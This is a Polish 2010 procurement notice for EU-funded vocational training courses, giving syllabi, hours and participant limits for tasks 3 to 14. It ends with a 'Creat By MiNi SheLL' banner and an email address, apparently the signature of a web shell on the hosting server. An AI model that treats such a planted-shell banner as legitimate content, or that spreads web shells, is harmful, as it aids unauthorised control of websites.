<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 14 Zadań -Zadanie 3 - Nowoczesne techniki wykończenia wnętrz
RAMOWY PROGRAM KURSU
1.Czas trwania kursu : 120 godzin w tym teoria - 30 godzin, tj.: 4 kolejne tygodnie.
2.Tematy zajęć:
2.1.Bezpieczeństwo i higiena pracy w zawodach budowlanych i przy pracach na wysokości - 5 godzin teorii,
2.2.Technologia robót malarskich i tynkarskich - 10 godzin teorii,
2.3.Technologia robót płytkarskich i posadzkarskich, montaż sufitów podwieszanych -  10 godzin teorii,
2.4.Materiałoznawstwo budowlane - 5 godzin teorii,
2.5.Zajęcia praktyczne - 90 godzin (roboty tynkarskie, malarskie, wykonywanie robót  posadzkarskich, montaż sufitów podwieszanych).
3.Liczba uczestników- maksymalnie 1 osoba..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4 -Opiekun osób starszych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 14 Zadań - Zadanie 4 -Opiekun osób starszych. RAMOWY PROGRAM KURSU
1.Czas trwania kursu:  120 godzin w tym teoria - 40 godzin, tj.: 4 kolejne tygodnie.
2.Tematy zajęć: 
2.1.Znajomość form opieki nad osobą starszą oraz znajomość form organizowania czasu wolnego - 6 godzin teorii,
2.2.Podstawy pedagogiki - 6 godzin teorii,
2.3.Podstawy psychologii - 6 godzin teorii,
2.4.Aspekty opieki nad ludźmi w wieku starszym, określenie predyspozycji, które należy spełnić wykonując zawód, techniki prowadzenia rozmów w trudnych sytuacjach życiowych, higiena psychiczna osoby starszej - 8 godzin teorii
2.5.Pierwsza pomoc i podstawy pielęgniarstwa - 5 godzin teorii, 8 godzin praktyki,
2.6.Zasady higieny osobistej, znajomość robienia i zmiany opatrunków, znajomość technik masażu - 3 godziny teorii, 12 godzin praktyki,
2.7.Technologie żywienia - 6 godzin teorii,
2.8.Praktyczne wykorzystanie zdobytych wiadomości - 60 godzin praktyki. 
3.Liczba uczestników- maksymalnie 7 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5 - Florystyka + kasa fiskalna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 14 Zadań - Zadanie 5 - Florystyka + kasa fiskalna
RAMOWY PROGRAM KURSU
1.Czas trwania kursu: 120 godzin w tym  teoria - 26 godzin, tj.: 4 kolejne tygodnie.
2.Tematy zajęć:
2.1.Anatomia i fizjologia roślin - 4 godziny teorii,
2.2.Utrwalanie roślin - 4 godzin teorii, 6 godzin praktyki,
2.3.Dekoracje pogrzebowe  - 4 godzin teorii, 18 godzin praktyki,
2.4.Wyroby ślubne i komunijne - 4 godzin teorii, 24 praktyki,
2.5.Wiązanki i dekoracje okolicznościowe - 4 godzin teorii, 16 godzin praktyki,
2.6.Dekorowanie różnych wnętrz - 4 godzin teorii, 12 godzin praktyki,
2.7.Obsługa kasy fiskalnej - 2 godziny teorii, 18 godzin praktyki.
3. Liczba uczestników- maksymalnie 9 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6 - Kadry płace.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 14 Zadań - Zadanie 6 - Kadry płace
RAMOWY PROGRAM KURSU
1.Czas trwania kursu  113 godzin w tym  teoria - 26 godzin, tj.: 4 kolejne tygodnie.
2.Tematy zajęć:
2.1.Organizacja i zasady działania biura - 2 godziny teorii, 6 godzin praktyki,
2.2.Zasady księgowości - 5 godzin teorii, 10 godzin praktyki,
2.3.Prawo pracy - 5 godzin teorii,
2.4.Prowadzenie dokumentacji kadrowej - 2 godziny teorii, 5 godzin praktyki,
2.5.Podstawy obsługi komputera - 2 godziny teorii, 8 godzin praktyki.
2.6.Podstawy WINDOWS Word Excel - 2 godziny teorii, 16 godzin praktyki,
2.7.Program KADRY - 2 godziny teorii, 12 godzin praktyki,
2.8.Obsługa programu PŁATNIK - 2 godziny teorii, 12 godzin praktyki,
2.9.Obsługa programu SYMFONIA - 2 godziny teorii, 12 godzin praktyki,
2.10.	Obsługa Internetu oraz poczty elektronicznej - 2 godziny teorii, 6 godzin praktyki.
3. Liczba uczestników - maksymalnie 4 osoby..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7 - Pracownik magazynu - hurtowni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 14 Zadań - Zadanie 7 - Pracownik magazynu - hurtowni.
RAMOWY PROGRAM KURSU
1.Czas  trwania kursu: 106 godzin w tym  teoria - 36 godzin, tj.: 4 kolejne tygodnie.
2.Tematy zajęć: 
2.1.Zasady BHP i przeciw pożarowe - 4 godziny teorii,
2.2.Gospodarka magazynowa i podstawy logistyki - 10 godzin teorii, 6 godzin praktyki,
2.3.Rodzaje podmiotów gospodarczych na podstawie: 2 godziny teorii
- Kodeksu cywilnego
- kodeksu spółek handlowych
2.4.Podatkowa książka przychodów i rozchodów - 2 godziny teorii, 8 godzin praktyki,
2.5.Minimum sanitarne - 5 godzin teorii,
2.6.Podstawy obsługi komputera - 1 godzina teorii, 13 godzin praktyki,
2.7.Obsługa programu magazynowego Subiekt - 25 godzin praktyki,
2.8.Obsługa kas fiskalnych - 12 godzin teorii, 18 godzin praktyki.
3.Liczba uczestników - maksymalnie 2 osoby..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8 - Opiekun dla dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 14 Zadań - Zadanie 8 - Opiekun dla dzieci
RAMOWY PROGRAM KURSU
1.Czas trwania kursu: 100 godzin w tym teoria - 40 godzin, tj.: 4 kolejne tygodnie.
2.Tematy zajęć:
2.1.Znajomość form opieki nad dzieckiem oraz znajomość form organizowania czasu wolnego - 12 godzin teorii,
2.2.Podstawy pedagogiki - 6 godzin teorii, 
2.3.Podstawy psychologii - 6 godzin teorii,
2.4.Pierwsza pomoc i podstawy pielęgniarstwa - 6 godzin teorii,
2.5.Zasady higieny osobistej dzieci - 4 godziny teorii,
2.6.Technologie żywienia - 6 godzin teorii,
2.7.Praktyczne wykorzystanie zdobytych wiadomości - 60 godzin praktyki.
3. Liczba uczestników - maksymalnie 3 osoby..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9 - Stylizacja paznokci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 14 Zadań - Zadanie 9 - Stylizacja paznokci.
RAMOWY PROGRAM KURSU
1.Czas trwania kursu: 100 godzin w tym  teoria - 38 godzin, tj.: 4 kolejne tygodnie.
2.Tematy zajęć:
2.1.Elementy anatomii ręki i nogi - 2 godziny teorii,
2.2.Paznokcie - budowa - 1 godzina teorii,
2.3.Zmiany w obrębie paznokcia - 4 godziny teorii,
2.4.Uszkodzenia skóry pochodzenia mechanicznego - 1 godzina teorii,
2.5.Choroby bakteryjne i grzybicze - 1 godzina teorii,
2.6.Potrzebne narzędzia do pielęgnacji dłoni i stóp - 1 godzina teorii,
2.7.Bezpieczny salon kosmetyczny - 1 godzina teorii,
2.8.Prawidłowy manicure - 6 godzin teorii,
2.9.Emalie i zmywacze do paznokci - 2 godziny teorii,
2.10.Pielęgnowanie dłoni i stóp - 2 godziny teorii,
2.11.Pedicure - 6 godzin teorii,
2.12.Masaż dłoni  i stóp - 3 godziny teorii,
2.13.Zajęcia praktyczne - 40 godzin praktyki,
2.14.Przedłużanie płytki paznokciowej - 8 godzin teorii, 22 godzin praktyki.
3.Liczba uczestników - maksymalnie 8 osób.
4.Wykonawca zapewni uczestnikom kursu wyprawkę na stałe w której skład będą wchodzić: suszarka, lampa, gilotyna, pilnik do paznokci, narzędzia do dekoracji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10- Kasjer sprzedawca + kasa fiskalna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 14 Zadań - Zadanie 10 -Kasjer sprzedawca + kasa fiskalna.
RAMOWY PROGRAM KURSU
1.Czas trwania kursu: 90 godzin w tym teoria - 38 godzin, tj.: 3 kolejne tygodnie.
2.Tematy zajęć: 
2.1.Obsługa i praktyczne zastosowanie kasy fiskalnej i komputera w procesie sprzedaży - 14 godzin teorii, 30 godzin praktyki,
2.2.Zasady, obsługa i rozliczenie procesu sprzedaży - 6 godzin teorii, 8 godzin praktyki,
2.3.Nowoczesne techniki sprzedaży - 10 godzin teorii, 14 godzin praktyki,
2.4.Zagadnienia HACCP - 8 godzin.
3.Liczba uczestników- maksymalnie 11 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie 11- Tworzenie stron internetowych z elementami grafiki komputerowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 14 Zadań - Zadanie 11 - Tworzenie stron internetowych z elementami grafiki komputerowej
RAMOWY PROGRAM KURSU
1.Czas trwania kursu: 70 godzin w tym  teoria - 20 godzin, tj.: 3 kolejne tygodnie.
2.Tematy zajęć:
2.1.Wprowadzenie do grafiki komputerowej - 3 godzin teorii, 
2.2.Program Photoshop - 1 godzina teorii, 2 godzin praktyki,
2.3.Techniki usuwania skaz, derasteryzacja zdjęć, wyostrzania zdjęć, korekcja tonalna, barwna, kształtu - 1 godzina teorii, 2 godzin praktyki,
2.4.Skanowanie zdjęć, obsługa skanera, ustawianie parametrów - 2 godziny teorii, 2 godziny praktyki,
2.5.Tworzenie prezentacji w programie PowerPoint - 2 godziny teorii, 4 godzin praktyki,
2.6.Program CorelDRAW - 1 godzina teorii, 4 godzin praktyki,
2.7.Efekt metamorfozy, modyfikacji kształtu, tworzenia równoległych konturów, efekt kadrowania - 2 godziny teorii, 4 godzin praktyki,
2.8.Wykorzystanie warstw, warstwy główne, wyrównanie i rozkład obiektów, klonowanie, tworzenie i wykorzystanie styli graficznych i tekstowych, praca z grafiką bitmapową - 2 godziny teorii, 5 godzin praktyki,
2.9.Podstawy tworzenia stron internetowych, historia Internetu i zadania HTML - 4 godziny praktyki,
2.10.	Potrzeba wyróżniania tekstu, pogrubianie, pochylanie, łamanie linii, wielkość, kolor, nagłówki, listy numerowane, listy wypunktowane - 1 godzina teorii, 5 godzin praktyki,
2.11.	Odnośniki (linki) - 1 godzina teorii, 5 godzin praktyki,
2.12.	Tworzenie tabeli - znaczniki, kolumny i wiersze tabeli, formularze - opcje znacznika FORM, wysyłka formularza, stworzenie formularza w tabeli - 1 godzina teorii, 5 godzin praktyki,
2.13.	Ramki zwykłe, pływające - różnice, znaki specjalne - przykłady i wskazanie źródeł, znaczniki ramek, zasady działania ramek, zasady tworzenia stron WWW - 1 godzina teorii, 5 godzin praktyki,
2.14.	Czym jest CSS, dołączanie CSS do dokumentu HTML, publikowanie strony, pozycjonowanie w wyszukiwarkach - 1 godzina teorii, 2 godziny praktyki,
2.15.	Obsługa programu Adobe Aprobat - 1 godzina teorii, 1 godzina praktyki.
3. Liczba uczestników - maksymalnie 1 osoba..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie 12 - Obsługa wózka widłowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 14 Zadań - Zadanie 12 - Obsługa wózka widłowego.
RAMOWY PROGRAM KURSU
1.Czas trwania kursu: 67 godzin  w tym  teoria - 48 godzin, tj.: 3 kolejne tygodnie.
2. Tematy zajęć:
2.1.Typy stosowanych wózków jezdniowych - 4 godziny, 
2.2. Budowa  wózka - 8 godzin,                                                                              
2.3. Czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy - 8 godzin,
2.4.Czynności operatora w czasie pracy wózkami - 8 godzin,                                                                                       
2.5.Wiadomości z zakresu   ładunkoznastwa - 4 godziny,                                                                         
2.6.Wiadomości  z  zakresu  BHP - 8 godzin,                                                
2.7.Praktyczna nauka jazdy i manewrowania osprzętem wózków - 15 godzin,      
2.8.Wiadomości o UDT - 4 godzin,
2.9.Użytkowania i wymiana butli gazowych - 4 godziny teorii, 4 godziny praktyki,    
Program kursu winien być realizowany na podstawie zgody ODK 943 M 2005.
3.Liczba uczestników - maksymalnie do 4 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie 13- Uprawnienia SEP do 1 KV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 14 Zadań - Zadanie 13- Uprawnienia SEP do 1 KV.
RAMOWY PROGRAM KURSU
1.Czas trwania kursu: 60 godzin w tym teoria - 45 godzin, tj.: 2 kolejne tygodnie.
2.Tematy zajęć:
2.1.Budowa instalacji elektroenergetycznych - 15 godzin teorii,
2.2.Montaż instalacji i urządzeń elektroenergetycznych - 5 godzin teorii,
2.3.Eksploatacja instalacji i sieci elektroenergetycznych - 15 godzin teorii,
2.4.Bezpieczeństwo przy obsłudze, naprawach, konserwacji, montażu i pracach kontrolno -pomiarowych- 15 godzin praktyki,
2.5.Pomiary ochronne w instalacjach elektroenergetycznych - 8 godzin teorii,
2.6.Aktualnie obowiązujące przepisy prawne dotyczące instalacji elektroenergetycznych - 2 godziny teorii.
3. Liczba uczestników- maksymalnie 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie 14- Obsługa kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów przyuczających do zawodu w ramach projektu systemowego Moda na sukces-czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 14 Zadań - Zadanie 14 - Obsługa kasy fiskalnej.
RAMOWY PROGRAM KURSU
1.Czas trwania kursu: 35 godzin w tym teoria - 17 godzin , tj.: 2 kolejne tygodnie.
2.Tematy zajęć: 
2.1.Podstawowe pojęcia techniczne i informatyczne, BHP - 2 godziny,
2.2.Przepisy i zasady finansowo księgowe sprzedaży z użyciem kas fiskalnych - 5 godzin,
2.3.Budowa i konstrukcja typowej kasy fiskalnej i rejestrującej - 5 godzin,
2.4.Materiały eksploatacyjne i ćwiczenia w ich wymianie - 3 godzin praktyki,
2.5.Zasady pracy z użyciem kasy fiskalnej - 15 godzin praktyki,
2.6.Zagadnienia HACCP (minimum sanitarne) - 5 godzin.
3. Liczba uczestników - maksymalnie 5 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com